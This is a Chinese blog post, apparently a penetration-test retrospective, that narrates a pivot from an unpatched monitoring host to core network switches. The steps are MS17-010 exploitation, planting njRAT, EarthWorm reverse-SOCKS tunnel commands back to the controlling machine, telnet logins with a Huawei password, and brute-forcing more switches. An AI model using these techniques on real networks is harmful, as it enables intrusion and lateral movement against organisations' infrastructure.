Loading

复盘从一个监控主机到核心路由沦陷

在对内网进行ms17-010扫描时,发现2台之前没有出现过且没有打补丁的主机,于是,尝试了一波

kali主机在扫描时发现2台之前没有出现过且没有打补丁的主机

1570723715159

尝试打了一波

1570723899385

然后种了个njrat

1570725845893

翻文件的时候发现了点配置文件

1570724083033

down下来解压后发现是交换机的配置文件,于是有了一个大胆的想法

1570724161870

查看了被控主机的网络连接后,发现一个地址无法ping通,TCP包也无法到达,推测做了ACL

1570724333653

于是在被控机上搭了earthworm做转发

本机执行ew -s rcsocks -l 本地代理端口 -e 远端连接端口

被控机执行ew -s rssocks -d 主控机IP -e 远端连接端口

1570724558982

然后开启proxifier的代理功能,成功访问了那个系统,但这不是主要目的

1570724652145

在咨询了好哥们后,他建议尝试搞搞交换机看看

在对10.2.66/24网段扫描后发现10.2.66.254开放了8023端口,尝试xshell连接

1570724812791

成功使用huawei密码[email protected]连接,继续翻上级路由

1570724864331

1570724926806

发现了10.2.20.1

继续telnet

1570724968457

继续翻

1570725016714

发现10.2.20.58

1570725071124

继续翻,翻到10.4.0.1

1570725139216

继续telnet

1570725188260

另外发现此时可以ping通10.4.0.1这台交换机

1570725560354

于是乎,扔浏览器打开看看

1570725700017

1570725725357

拿下后将本次收集到的密码与巡风扫描到的telnet主机进行爆破后发现了更多的交换机。。。。。。

1570725809593


本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明出处!
本文地址:https://0x20h.com/p/aac0.html
Sp4ce's Blog 复盘从一个监控主机到核心路由沦陷

 上一篇
Cobalt Strike Teamserer的搭建 Cobalt Strike Teamserer的搭建
记录下Cobalt Strike Teamserer的搭建 环境如下 Ubuntu 18.04 Cobalt Strike 3.14 准备一台Ubuntu 18.04的服务器,下载Cobalt Strike完整文件并传到服务器上
2019-11-02
下一篇 
内网渗透 内网渗透
在上次拿下了一台内网主机后,将其作为跳板,对192.168/16网段进行了扫描 介绍先上一张内网环境拓扑图 经过扫描后,识别出几个重要资产,并将他们作为目标进行针对性的测试 192.168.122.8192.168.122.11192
2019-09-19
  目录